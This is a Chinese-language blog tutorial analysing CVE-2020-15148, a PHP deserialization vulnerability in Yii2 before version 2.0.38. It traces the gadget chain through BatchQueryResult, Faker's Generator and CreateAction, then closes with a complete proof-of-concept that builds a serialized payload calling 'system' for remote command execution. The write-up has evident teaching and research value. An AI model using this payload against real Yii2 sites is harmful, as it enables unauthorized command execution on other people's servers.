在学习该漏洞之前我们需要学习一下前置知识来更好的理解该漏洞的产生原因以及如何利用。 我们先来学习一下框架的基本信息以及反序列化漏洞的基本利用过程。

Yii2

Yii是一个基于组件的高性能PHP框架，用于开发大型Web应用。Yii采用严格的OOP编写，并有着完善的库引用以及全面的教程。而CVE-2020-15148则是在其版本YII2.0.38之前的一个反序列化漏洞，该漏洞在调用unserialize时，攻击者可通过构造特定的恶意请求执行任意命令，这也是常见的反序列化漏洞的利用过程。

魔术方法

提到PHP反序列化一定离不开魔术方法，这些方法通常会在达到一些特殊条件后就会执行，举个例子：

__construct() //新建对象时调用

我们编写下面的代码:

当我们执行时new了一个类，这就会调用里面的魔术方法，从而输出语句。当然这只是最简单的魔术方法，下面给大家一个列表来进行参考：

了解完以上知识点后我们开始对该漏洞进行分析。

漏洞分析

首先我们要搭建环境，最好搭建在本地方便调试，源码地址如下：

github.com/yiisoft/yii…

搭建完后我们首先找到漏洞切入点，也就是可能存在威胁的地方，结合上面对魔术方法的分析在 /vendor/yiisoft/yii2/db/BatchQueryResult.php下找到了可能存在漏洞的点，因为里面有个魔术方法在对象销毁时调用：

__destruct()调用了reset()方法，方法里面的$this->_dataReader是可控的：

1. public function reset() 
2. { 
3.         if ($this->_dataReader !== null) { 
4.             $this->_dataReader->close(); 
5.         } 

于是思考接下来要如何利用，根据POC的构造，假设我们将_dataReader变成类然后去调用close()方法，若类型没有close()方法，同时还有__call魔术方法，则会调用该魔术方法。我们找到faker/src/Faker/Generator.php：里面存在call方法且调用了foemat方法：

1. public function format($formatter, $arguments = array()) 
2.     { 
3.         return call_user_func_array($this->getFormatter($formatter), $arguments); 
4.     } 

跟进这里：

$this->getFormatter($formatter)

看到存在可控参数：

1. public function getFormatter($formatter) 
2. { 
3.         if (isset($this->formatters[$formatter])) {  
4.             return $this->formatters[$formatter]; 
5.         } 
6.         foreach ($this->providers as $provider) { 
7.             if (method_exists($provider, $formatter)) { 
8.                 $this->formatters[$formatter] = array($provider, $formatter); 
9.                 return $this->formatters[$formatter]; 
10.             } 
11.         } 

this−>formatters[this - > formatters[this−>formatters[formatter] 有值，就返回其值,回看一下会发现值为：

$formatter='close',$arguments=空

即返回的第一个参数是可控的，我们便可以调用任意的无参方法，这里找到/vendor/yiisoft/yii2/rest/CreateAction.php：

1. public function run() 
2.    { 
3.        if ($this->checkAccess) { 
4.            call_user_func($this->checkAccess, $this->id); 
5.        } 

this−>checkAccess，this->checkAccess，this−>checkAccess，this->id是可控的，那么就可以执行RCE。利用链如下：

yii\db\BatchQueryResult::__destruct()->Faker\Generator::__call()->yii\rest\CreateAction::run()

这里贴一个大佬们的POC：

1. <?php 
2. namespace yiirest{ 
3.     class CreateAction{ 
4.         public $checkAccess; 
5.         public $id; 
6.         public function __construct(){ 
7.             $this->checkAccess = 'system'; 
8.             $this->id = 'phpinfo();'; 
9.         } 
10.     } 
11. } 
12. namespace Faker{ 
13.     use yiirestCreateAction; 
14.     class Generator{ 
15.         protected $formatters; 
16.         public function __construct(){ 
17.             $this->formatters['close'] = [new CreateAction, 'run']; 
18.         } 
19.     } 
20. } 
21. namespace yiidb{ 
22.     use FakerGenerator; 
23.     class BatchQueryResult{ 
24.         private $_dataReader; 
25.         public function __construct(){ 
26.             $this->_dataReader = new Generator; 
27.         } 
28.     } 
29. } 
30. namespace{ 
31.     echo base64_encode(serialize(new yiidbBatchQueryResult)); 
32. } 
33. ?> 

下面是传入构造好的payload对网站进行请求的结果，可以看到成功进行了命令执行。

结语

今天给大家带来的是CVE-2020-15148漏洞的简单分析，整体看下来还是很简单的，我们需要注意如何调用的魔术方法以及如何进行RCE，有兴趣的小伙伴可以自己去搭建环境进行测试，喜欢本文的朋友希望可以一键三连支持一下。

Tags: CVE-2020-15148

分享到：